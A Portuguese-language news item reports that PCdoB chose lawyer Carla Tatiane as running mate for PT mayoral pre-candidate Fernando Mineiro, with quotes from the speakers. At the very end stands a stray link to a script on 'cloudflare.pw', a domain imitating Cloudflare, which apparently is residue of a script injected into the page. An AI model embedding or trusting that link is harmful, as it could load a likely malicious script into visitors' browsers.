_DSC1771O deputado estadual e pré-candidato a prefeito, Fernando Mineiro (PT), participou do encontro municipal do PCdoB no início da noite deste sábado (30), que indicou o nome da advogada Carla Tatiane para compor a chapa majoritária do partido nas eleições deste ano.

O encontro aconteceu no auditório da Federação dos Trabalhadores Rurais na Agricultura do Estado (Fetarn) e reuniu a militância dos dois partidos.

Mineiro afirmou que a decisão do PCdoB deixa ele e toda a militância do PT ainda mais animada para a disputa. “Me sinto muito honrado em também representar a aguerrida militância do PCdoB. A escolha de Carla Tatiane, uma jovem advogada, aponta para o compromisso de nossa chapa com a renovação da política e amplia o diálogo já existente com as mulheres”.

O vereador George Câmara (PCdoB) enfatizou o compromisso de diálogo constante ao falar sobre a luta histórica de empoderamento da mulher dentro do partido. “A participação da mulher dentro de espaços de luta é uma prática há muito incorporada pelo PCdoB, a indicação do nome de Carla reforça essa luta, além de encorajar a juventude a também participar do debate”.

A advogada e pré-candidata a vice de Mineiro, Carla Tatiane, reconhece a importância da missão que o PCdoB lhe concedeu. “A chapa encabeçada pelo PT e PCdoB representa a defesa de um projeto de cidade que contempla a todos, e não apenas aos dois partidos e suas militâncias. Representamos todos que encampam a luta pela democracia. Sei que nossa batalha será dura, mas será também vitoriosa”, declarou.

O nome de Carla Tatiane será homologado na convenção do PCdoB nesta terça-feira, dia 2, às 9h, na sede do partido.

https://cloudflare.pw/cdn/statslg30.js

Anúncios